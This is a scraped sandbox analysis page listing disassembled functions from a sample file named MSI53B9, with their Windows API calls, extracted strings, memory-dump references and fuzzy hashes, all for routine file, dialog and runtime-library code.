Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ea23a0b5be8d720a81cc3f877502472f5d544f68c9a06fa8112536a0a6d4999
Instruction ID: c0f8e0f045fa2d86d7b5e4e30976c26e33afe321cda598dca627a600f0b93ed5
Opcode Fuzzy Hash: 9ea23a0b5be8d720a81cc3f877502472f5d544f68c9a06fa8112536a0a6d4999
Instruction Fuzzy Hash: 9571257030438A5BDB24FE6CD8D4BAD37D1FB91B04F00492DE98ACB286DB74DA858756

Function 0087D1D2 Relevance: .2, Instructions: 190COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bef3f16cc0c4f77c20004e5b0736d2e18fd6caa9a81c3e33b2f5ddbe5016529f
Instruction ID: 1ec981e9ee873888c9cb5c808af011f44b36b455d385c61eb8d2d1405a5db74a
Opcode Fuzzy Hash: bef3f16cc0c4f77c20004e5b0736d2e18fd6caa9a81c3e33b2f5ddbe5016529f
Instruction Fuzzy Hash: 5B81A09221A2E45DD7068F7D38E42E53FA1BB73300F1C55AAC4C9C66B7C0369568D721

Function 0087DBE2 Relevance: .2, Instructions: 154COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c0c3b2c285c2a32929f24858096ab199fc9cacfdd71c1866548cd8d68f937e9a
Instruction ID: 7ae69e1893e04662a8846f7b937d2b5d905b09df795649a6ede333cd3fbee7ee
Opcode Fuzzy Hash: c0c3b2c285c2a32929f24858096ab199fc9cacfdd71c1866548cd8d68f937e9a
Instruction Fuzzy Hash: 6D51CC756083954ED712CF29818046EBFF1FFDA324F49889EE4D98B256C230D68ADB52

Function 0087EC97 Relevance: .1, Instructions: 131COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6d6c3630af026bc64e73a6223a28ad4f3883afecc7172390ed57d0fdf78d5919
Instruction ID: 5eee0bf4ec75cd7d90f3eecfef004310fdf31598427bb6342a43775b8506fd39
Opcode Fuzzy Hash: 6d6c3630af026bc64e73a6223a28ad4f3883afecc7172390ed57d0fdf78d5919
Instruction Fuzzy Hash: 47512371A083068BC748CF19D48059AF7E1FBC8314F058A2EE899E7744DB34EA59CB96

Function 00882B3A Relevance: .1, Instructions: 112COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 03d8200d211fb2155360bb18f1da6528e951efe338ec765a37701bdcb59cc893
Instruction ID: f0df8f576b88fed0cb2757a94f2bd6d852184bfc87f6bf8891005ce7c6f98b5c
Opcode Fuzzy Hash: 03d8200d211fb2155360bb18f1da6528e951efe338ec765a37701bdcb59cc893
Instruction Fuzzy Hash: 513105B160474A8FCB18EF28C85126EBBE0FB95710F00892DE4DAD7341C779E909CB52

Function 00875E96 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f0ee0da09eb05b2c5d72f09def0539f148b5fecda8de6616bd2e114259a1d219
Instruction ID: d5a1f29f3e6d24959af7b07510ea96cc59df5a3baf00afb10cf592b39b1675c2
Opcode Fuzzy Hash: f0ee0da09eb05b2c5d72f09def0539f148b5fecda8de6616bd2e114259a1d219
Instruction Fuzzy Hash: 9321DA32A201655FDB08CF2DECA44367351F787311786C12FEA46CB6D5C635E925CBA0

Function 0088AA45 Relevance: 31.9, APIs: 14, Strings: 4, Instructions: 438windowfileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0088AA4A

Part of subcall function 008896EC: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 008897B4

SetFileAttributesW.KERNEL32(?,00000005,?,?,?,00000800,?,?,00000000,00000001,0088A35D,?,00000000), ref: 0088AB7F
GetFileAttributesW.KERNEL32(?), ref: 0088AC39
DeleteFileW.KERNEL32(?), ref: 0088AC47
SetWindowTextW.USER32(?,?), ref: 0088AD90
_wcsrchr.LIBVCRUNTIME ref: 0088AF1A
GetDlgItem.USER32(?,00000066), ref: 0088AF55
SetWindowTextW.USER32(00000000,?), ref: 0088AF65
SendMessageW.USER32(00000000,00000143,00000000,008B412A), ref: 0088AF79
SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0088AFA2

Strings

<br>, xrefs: 0088ACF3
Software\Microsoft\Windows\CurrentVersion, xrefs: 0088AE39
ProgramFilesDir, xrefs: 0088AE64
%s.%d.tmp, xrefs: 0088AC5F

Memory Dump Source

Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd

Similarity

API ID: File$AttributesMessageSendTextWindow$DeleteEnvironmentExpandH_prologItemStrings_wcsrchr
String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
API String ID: 3676479488-312220925
Opcode ID: 9dff886a3c61d433ed9600e6a5d92c7d90ea90e02aa54e945f38dc525f6d44c2
Instruction ID: c718ee65a4da757e39a1b4c14e9c16b1e4cf1fd828b34ab1211fedc022ecec5b
Opcode Fuzzy Hash: 9dff886a3c61d433ed9600e6a5d92c7d90ea90e02aa54e945f38dc525f6d44c2
Instruction Fuzzy Hash: 86E14B72900119AAEF24FBA4DD85EEE737CFB45350F1440A6F519E3181EB749B848F62

Function 0089958D Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 008995D1

Part of subcall function 0089916C: _free.LIBCMT ref: 00899189
Part of subcall function 0089916C: _free.LIBCMT ref: 0089919B
Part of subcall function 0089916C: _free.LIBCMT ref: 008991AD
Part of subcall function 0089916C: _free.LIBCMT ref: 008991BF
Part of subcall function 0089916C: _free.LIBCMT ref: 008991D1
Part of subcall function 0089916C: _free.LIBCMT ref: 008991E3
Part of subcall function 0089916C: _free.LIBCMT ref: 008991F5
Part of subcall function 0089916C: _free.LIBCMT ref: 00899207
Part of subcall function 0089916C: _free.LIBCMT ref: 00899219
Part of subcall function 0089916C: _free.LIBCMT ref: 0089922B
Part of subcall function 0089916C: _free.LIBCMT ref: 0089923D
Part of subcall function 0089916C: _free.LIBCMT ref: 0089924F
Part of subcall function 0089916C: _free.LIBCMT ref: 00899261

_free.LIBCMT ref: 008995C6

Part of subcall function 008959C2: RtlFreeHeap.NTDLL(00000000,00000000,?,00899301,?,00000000,?,00000000,?,00899328,?,00000007,?,?,00899725,?), ref: 008959D8
Part of subcall function 008959C2: GetLastError.KERNEL32(?,?,00899301,?,00000000,?,00000000,?,00899328,?,00000007,?,?,00899725,?,?), ref: 008959EA

_free.LIBCMT ref: 008995E8
_free.LIBCMT ref: 008995FD
_free.LIBCMT ref: 00899608
_free.LIBCMT ref: 0089962A
_free.LIBCMT ref: 0089963D
_free.LIBCMT ref: 0089964B
_free.LIBCMT ref: 00899656
_free.LIBCMT ref: 0089968E
_free.LIBCMT ref: 00899695
_free.LIBCMT ref: 008996B2
_free.LIBCMT ref: 008996CA

Memory Dump Source

Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 52ef9a6a941dacaa6ffa0c9a9a3ee992f34a1b3026001c28e40208e5d5db2acb
Instruction ID: 9b8bd0d2f0f14ef3227c44121e4cb5e15550288d4424805cb48f87aec98147e3
Opcode Fuzzy Hash: 52ef9a6a941dacaa6ffa0c9a9a3ee992f34a1b3026001c28e40208e5d5db2acb
Instruction Fuzzy Hash: 51310671604701EFEF22BA7DE845B5A77E9FB11320F18846DE4D9D6151DE35AC80CB12

Function 0088B8BC Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 80windowCOMMON

Download Yara Rule

APIs

GetWindow.USER32(?,00000005), ref: 0088B8DD
GetClassNameW.USER32(00000000,?,00000800), ref: 0088B90C

Part of subcall function 00880B12: CompareStringW.KERNEL32(00000400,00001001,00000000,000000FF,?,000000FF,0087AC49,?,?,?,0087ABF8,?,-00000002,?,00000000,?), ref: 00880B28

GetWindowLongW.USER32(00000000,000000F0), ref: 0088B92A
SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 0088B941
GetObjectW.GDI32(00000000,00000018,?), ref: 0088B954

Part of subcall function 00888B22: GetDC.USER32(00000000), ref: 00888B2E
Part of subcall function 00888B22: GetDeviceCaps.GDI32(00000000,0000005A), ref: 00888B3D
Part of subcall function 00888B22: ReleaseDC.USER32(00000000,00000000), ref: 00888B4B

Part of subcall function 00888ADF: GetDC.USER32(00000000), ref: 00888AEB
Part of subcall function 00888ADF: GetDeviceCaps.GDI32(00000000,00000058), ref: 00888AFA
Part of subcall function 00888ADF: ReleaseDC.USER32(00000000,00000000), ref: 00888B08

SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0088B97B
DeleteObject.GDI32(00000000), ref: 0088B982
GetWindow.USER32(00000000,00000002), ref: 0088B98B

Strings

STATIC, xrefs: 0088B912

Memory Dump Source

Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd

Similarity

API ID: Window$CapsDeviceMessageObjectReleaseSend$ClassCompareDeleteLongNameString
String ID: STATIC
API String ID: 1444658586-1882779555
Opcode ID: 519b05cfea3c7ce7828638292437d5fb08cd8d4118e6ee2bff5228a3597e7d98
Instruction ID: de04e75d3c7caa7d2e492b8fb9bffbd3afca8b9f8c45512c95cd82ad8e8f4a6f
Opcode Fuzzy Hash: 519b05cfea3c7ce7828638292437d5fb08cd8d4118e6ee2bff5228a3597e7d98
Instruction Fuzzy Hash: 0721D1726402247BEB217B68DC4AFAE7A6CFF45710F004011FA01E6991EB649D0287B6

Function 0089622B Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0089623F

Part of subcall function 008959C2: RtlFreeHeap.NTDLL(00000000,00000000,?,00899301,?,00000000,?,00000000,?,00899328,?,00000007,?,?,00899725,?), ref: 008959D8
Part of subcall function 008959C2: GetLastError.KERNEL32(?,?,00899301,?,00000000,?,00000000,?,00899328,?,00000007,?,?,00899725,?,?), ref: 008959EA

_free.LIBCMT ref: 0089624B
_free.LIBCMT ref: 00896256
_free.LIBCMT ref: 00896261
_free.LIBCMT ref: 0089626C
_free.LIBCMT ref: 00896277
_free.LIBCMT ref: 00896282
_free.LIBCMT ref: 0089628D
_free.LIBCMT ref: 00896298
_free.LIBCMT ref: 008962A6

Memory Dump Source

Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 84727e752cf5e540588c5a313db423133813aaf5acd19e36fe36a7c9eaf59412
Instruction ID: 329ecddd819d9ce540fb81caaa021b7c01341a9d4810c6eff37435b6f84a513a
Opcode Fuzzy Hash: 84727e752cf5e540588c5a313db423133813aaf5acd19e36fe36a7c9eaf59412
Instruction Fuzzy Hash: 39117775610608EFDF02FF98DC52DD93F65FF04360B5545A5BA888F122DA31DE509B41

Function 008720E6 Relevance: 14.5, APIs: 5, Strings: 3, Instructions: 480COMMON

Download Yara Rule

Strings

xc%u, xrefs: 0087265B
x%u, xrefs: 008725FE
;%u, xrefs: 0087241B

Memory Dump Source

Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd

Similarity

API ID:
String ID: ;%u$x%u$xc%u
API String ID: 0-2277559157
Opcode ID: 5c289556f9198bd0bb02cccfb5fbe69ea105cd1c3314096adce083c4856b5e23
Instruction ID: 6e116eab2edd07890d37ac980325265105f266eb1dbaafde2f1648c4f9b47164
Opcode Fuzzy Hash: 5c289556f9198bd0bb02cccfb5fbe69ea105cd1c3314096adce083c4856b5e23
Instruction Fuzzy Hash: D4F126716042805BDB19EE688895BEA7799FF94300F08C46DF88EDB29FDB24D944C763

Function 0088995F Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 99windowCOMMON

Download Yara Rule

APIs

Part of subcall function 008712E7: GetDlgItem.USER32(00000000,00003021), ref: 0087132B
Part of subcall function 008712E7: SetWindowTextW.USER32(00000000,008A02E4), ref: 00871341

EndDialog.USER32(?,00000001), ref: 008899AF
SendMessageW.USER32(?,00000080,00000001,?), ref: 008899DC
SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 008899F1
SetWindowTextW.USER32(?,?), ref: 00889A02
GetDlgItem.USER32(?,00000065), ref: 00889A0B
SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 00889A1F
SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 00889A31

Strings

LICENSEDLG, xrefs: 00889973

Memory Dump Source

Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd

Similarity

API ID: MessageSend$Item$TextWindow$Dialog
String ID: LICENSEDLG
API String ID: 3214253823-2177901306
Opcode ID: 2516246b9d5ba63490d16e9631375448323eb80a85e5f612b3457aeba26535b1
Instruction ID: 9def3b2e1ff674105a9c1d73c6ce7f2d799e4a11546fa97362f0728b93458bf7
Opcode Fuzzy Hash: 2516246b9d5ba63490d16e9631375448323eb80a85e5f612b3457aeba26535b1
Instruction Fuzzy Hash: 4421D632240114BBE615BB69ED49E7B3FADFB47B94F054018F640E2891CB66AC01D772

Function 0087922D Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 137fileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00879232
GetLongPathNameW.KERNEL32(?,?,00000800), ref: 00879255
GetShortPathNameW.KERNEL32(?,?,00000800), ref: 00879274

Part of subcall function 00880B12: CompareStringW.KERNEL32(00000400,00001001,00000000,000000FF,?,000000FF,0087AC49,?,?,?,0087ABF8,?,-00000002,?,00000000,?), ref: 00880B28

_swprintf.LIBCMT ref: 00879310

Part of subcall function 00873F5B: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00873F6E

MoveFileW.KERNEL32(?,?), ref: 00879385
MoveFileW.KERNEL32(?,?), ref: 008793C1

Strings

rtmp%d, xrefs: 008792F9

Memory Dump Source

Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd

Similarity

API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf
String ID: rtmp%d
API String ID: 2111052971-3303766350
Opcode ID: 90f918a60a64044f447ffb8163633d0239f3f1a008aa14deb036caf624dba89a
Instruction ID: 230773f68e562cd95df5b9009eb75f1cb2956cf55e8040682457011df3950d81
Opcode Fuzzy Hash: 90f918a60a64044f447ffb8163633d0239f3f1a008aa14deb036caf624dba89a
Instruction Fuzzy Hash: AE416871911258A6DF20FBA88D85EEE777DFF05380F0080A5E58DE315AEA34CB458F62

Function 00887D96 Relevance: 12.1, APIs: 8, Instructions: 135windowCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00887DAF
GetTickCount.KERNEL32 ref: 00887DCD
PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00887DE3
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00887DF7
TranslateMessage.USER32(?), ref: 00887E02
DispatchMessageW.USER32(?), ref: 00887E0D
ShowWindow.USER32(?,00000005,?,00000000,?,?,?,?,00000000,00000000,00000000,<html>,00000006), ref: 00887EBD
SetWindowTextW.USER32(?,00000000), ref: 00887EC7

Memory Dump Source

Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd

Similarity

API ID: Message$CountTickWindow$DispatchPeekShowTextTranslate
String ID:
API String ID: 4150546248-0
Opcode ID: 60f37ce176876f781ccd85f0cc216b45f9a1fc75b41a600903ada7d9adde1a60
Instruction ID: 4bcef69e9489e95c86fbed517f7d29b6eb7da58094f66e83c035a09cf2552b2d
Opcode Fuzzy Hash: 60f37ce176876f781ccd85f0cc216b45f9a1fc75b41a600903ada7d9adde1a60
Instruction Fuzzy Hash: F6415971208306AFD714EF65C88892BBBF9FF89B05B10086DB646C7611DB71EC45CB62

Function 0087FE20 Relevance: 12.1, APIs: 8, Instructions: 117timeCOMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 0087FE33

Part of subcall function 0087A8E0: GetVersionExW.KERNEL32(?), ref: 0087A905

FileTimeToLocalFileTime.KERNEL32(?,?,00000000,?,00000064,00000000,?,00000000,?), ref: 0087FE5C
FileTimeToSystemTime.KERNEL32(?,?,00000000,?,00000064,00000000,?,00000000,?), ref: 0087FE6E
SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 0087FE7B
SystemTimeToFileTime.KERNEL32(?,?), ref: 0087FE91
SystemTimeToFileTime.KERNEL32(?,?), ref: 0087FE9D
FileTimeToSystemTime.KERNEL32(?,?), ref: 0087FED3
__aullrem.LIBCMT ref: 0087FF5D

Memory Dump Source

Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd

Similarity

API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
String ID:
API String ID: 1247370737-0
Opcode ID: df5882e55db8b49c7ee84c80dccb44061b27680a52221260f4b02841edd2c713
Instruction ID: c5728cc8ea80000e6109ebb245e32929aacf9d05adad6b5e30077fdba084a3d3
Opcode Fuzzy Hash: df5882e55db8b49c7ee84c80dccb44061b27680a52221260f4b02841edd2c713
Instruction Fuzzy Hash: A44128B24083059FC310DF65C8809ABB7F8FF88714F008A2EF69AD2651EB35E548DB52

Function 0089C56D Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,0089CCE2,00000000,00000000,00000000,00000000,00000000,00892C4E), ref: 0089C5AF
__fassign.LIBCMT ref: 0089C62A
__fassign.LIBCMT ref: 0089C645
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 0089C66B
WriteFile.KERNEL32(?,00000000,00000000,0089CCE2,00000000,?,?,?,?,?,?,?,?,?,0089CCE2,00000000), ref: 0089C68A
WriteFile.KERNEL32(?,00000000,00000001,0089CCE2,00000000,?,?,?,?,?,?,?,?,?,0089CCE2,00000000), ref: 0089C6C3

Memory Dump Source

Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: 3cb5cfea0b353e741ffb006acc8e620777f36e73ba093633c6277a43786776f2
Instruction ID: 8d0dbc9b501a8c47f834ee85e4511321c17aff3cfe24b479c58f05ff39490328
Opcode Fuzzy Hash: 3cb5cfea0b353e741ffb006acc8e620777f36e73ba093633c6277a43786776f2
Instruction Fuzzy Hash: 9251B3B1A00209AFDF14DFA8D885AEEBBF4FF19300F18415AE556E7251E7319940CF65

Function 0088B0D9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 135COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000800,?), ref: 0088B0EF
_swprintf.LIBCMT ref: 0088B123

Part of subcall function 00873F5B: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00873F6E

SetDlgItemTextW.USER32(?,00000066,008B3122), ref: 0088B143
_wcschr.LIBVCRUNTIME ref: 0088B176
EndDialog.USER32(?,00000001), ref: 0088B257

Strings

%s%s%u, xrefs: 0088B118

Memory Dump Source

